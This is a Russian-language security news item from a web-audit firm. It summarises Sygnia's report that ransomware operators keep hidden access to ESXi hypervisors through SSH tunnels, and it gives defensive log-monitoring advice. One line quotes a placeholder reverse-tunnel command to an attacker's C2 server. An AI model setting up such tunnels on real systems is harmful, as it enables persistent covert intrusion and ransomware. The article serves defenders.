Бесплатно Экспресс-аудит сайта:

Проверить
ГлавнаяО компанииПочему?Аудит безопасностиУстранение уязвимостейFAQНовостиКонтакты
28.01.2025

Sygnia: вымогатели атакуют Bare-metal гипервизоры ESXi

Хакеры, нацеленные на Bare-metal гипервизоры ESXi , используют туннелирование SSH для сохранения доступа к системе и обхода обнаружения. Эти устройства играют критическую роль в виртуализированных средах, позволяя запускать на одном физическом сервере множество виртуальных машин.

Из-за низкого уровня мониторинга гипервизоры ESXi часто становятся объектами атак. Злоумышленники, проникнув в корпоративную сеть, крадут данные и шифруют файлы, фактически парализуя работу компании, делая виртуальные машины недоступными.

Согласно отчёту компании Sygnia , компрометация гипервизоров часто достигается путём эксплуатации известных уязвимостей или использования скомпрометированных учётных данных администраторов. ESXi имеет встроенный SSH-сервис, позволяющий администраторам удалённо управлять гипервизором. Эту функцию злоумышленники используют для организации устойчивого доступа, перемещения по сети и внедрения программ-вымогателей.

Sygnia отмечает, что злоумышленники устанавливают туннели с помощью встроенной функциональности SSH или популярных инструментов, предоставляющих схожие возможности. Пример команды для настройки перенаправления порта:

ssh –fN -R 127.0.0.1:<порт SOCKS> <пользователь>@<IP C2 сервера>

«ESXi-устройства редко перезагружаются неожиданно, что позволяет использовать такой туннель как полупостоянную точку входа в сеть», — объясняет Sygnia.

Важным фактором успеха атак является сложность мониторинга логов ESXi. В отличие от большинства систем, где логи хранятся в одном файле, ESXi распределяет их по нескольким местам. Это усложняет поиск улик, поскольку данные нужно собирать из множества источников. Для обнаружения активности злоумышленников Sygnia рекомендует проверять следующие файлы:

  • /var/log/shell.log — отслеживает выполнение команд в оболочке ESXi;
  • /var/log/hostd.log — фиксирует административные действия и аутентификацию пользователей;
  • /var/log/auth.log — регистрирует попытки входа и события аутентификации;
  • /var/log/vobd.log — хранит системные и информационные события безопасности.

Кроме того, логи hostd.log и vobd.log могут содержать следы изменения правил файервола, что необходимо для сохранения постоянного SSH-доступа. Однако злоумышленники часто очищают журналы, изменяют временные метки или укорачивают логи, чтобы скрыть свои действия.

Для повышения безопасности рекомендуется централизовать логи ESXi с помощью пересылки syslog и интеграции их в систему управления событиями безопасности ( SIEM ) для выявления аномалий.